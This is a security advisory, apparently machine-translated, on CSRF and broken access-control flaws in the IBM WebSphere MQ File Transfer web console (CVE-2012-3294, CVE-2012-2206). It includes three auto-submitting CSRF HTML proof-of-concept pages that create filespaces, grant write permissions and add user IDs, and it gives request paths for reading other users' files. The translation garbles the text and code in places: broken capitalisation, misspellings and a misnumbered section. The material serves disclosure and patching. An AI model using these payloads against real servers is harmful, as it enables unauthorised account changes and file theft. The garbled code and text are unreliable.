Multiple security vulnerabilities in the IBM WebSphere MQ 'web gateway' component

Release date:
Updated on:

Affected Systems:
IBM WebSphere MQ 7.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54983
Cve id: CVE-2012-3294, CVE-2012-2206

IBM WebSphere MQ is used to provide message transmission services in enterprises.

IBM WebSphere MQ has two security vulnerabilities that can be exploited by malicious users to bypass certain security restrictions and perform cross-site request forgery attacks.

1) applications allow users to perform certain operations through HTTP requests without verifying these requests. After logging on to a malicious website, users can edit the user space or change the file space permissions. This vulnerability exists in File Transfer Edition v7.0.3, 7.0.4, Managed File Transfer v7.5.0, and other versions.

2) if an error occurs because the application does not have the access permission verification, other user files can be downloaded. Successful exploitation of this vulnerability requires a File URL. This vulnerability exists in File Transfer Edition v7.0.3, 7.0.4, and other versions.

<* Source: Nir valman

Link: http://www-01.ibm.com/support/docview.wss? Uid = swg21607481
Http://secunia.com/advisories/50225/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

The following test method is provided:

* Exploit Details :*
* 1. CSRF To add user and define his quota on a userspace *
I created the following HTML page and then opened it by a logged-on user:

<Html>

<Head>

<Body>

<Form id = "frm" method = "post"
Action = "https://www.example.com/wmqfteconsole/Filespaces"

<Input type = "hidden"
Name = "nirvcsrf" value = "junk"/>

<Input type = "hidden"
Name = "name" value = "zzzzzz"/>

<Input type = "hidden"
Name = "quota" value = "15"/>

<Input type = "hidden"
Name = "id" value = "NewFileSpace"/>

 

</Form>

<Script>

Document. frm. submit ();

</Script>

</Body>
</Html>
See the following screenshot, which follows the execution of CSRF attack:
[Image: Inline image 1]

* 2. CSRF to add permissions on file spaces :*
I created the following HTML page and then opened it by a logged-on user:

<Html>

<Head>

<Body>

<Form id = "frm" method = "post"
Action = "https://www.example.com
/Wmqfteconsole/FileSpacePermisssions"

<Input type = "hidden"
Name = "nirvcsrf" value = "junk"/>

<Input type = "hidden"
Name = "user" value = "bodek2"/>

<Input type = "hidden"
Name = "write" value = "authorized"/>

<Input type = "hidden"
Name = "id" value = "zzzzzz_TEMP_PERMISSIONS"/>

 

</Form>

<Script>

Document. frm. submit ();

</Script>

</Body>
</Html>

* 2. CSRF to add MQMD user id :*
I created the following HTML page and then opened it by a logged-on user:

<Html>

<Head>

<Body>

<Form id = "frm" method = "post"
Action = "https://www.example.com/wmqfteconsole/UploadUsers"

<Input type = "hidden"
Name = "nirvcsrf" value = "junk"/>

<Input type = "hidden"
Name = "userID" value = "csrfUserId"/>

<Input type = "hidden"
Name = "mqmdUserID" value = "userIdTest"/>

<Input type = "hidden"
Name = "id" value = "NewUploadUser"/>

 

</Form>

<Script>

Document. frm. submit ();

</Script>

</Body>

Details :*
* 1. Privilege escalation to view other user's files and filespace *
I logged on using user "user2" (non-administrative account
With download \ upload files permissions only) and then sent a GET request
The following URL:
/Transfer /? Start = 0 & count = 10 & metadata = fteSampleSUSEr = user1
As a result, the response has Ded the data of "user1 ".

* 2. Privilege escalation to download user's files *
In order to execute the attack, the malicious user shoshould know the file
Name and the related ID before executing the attack.
In this scenario, The malicious user is "user2" and the attacked user is
"User1 ".
If "user2" knows the url to file of "user1", then he can access this file,
E.g. "user2" is able to access the following URL using a GET request:
/Filespace/user1
/414d512057514d5420202020202020eb3bfc4f2030df02/changedthisfilename.txt

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

IBM
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.ers.ibm.com/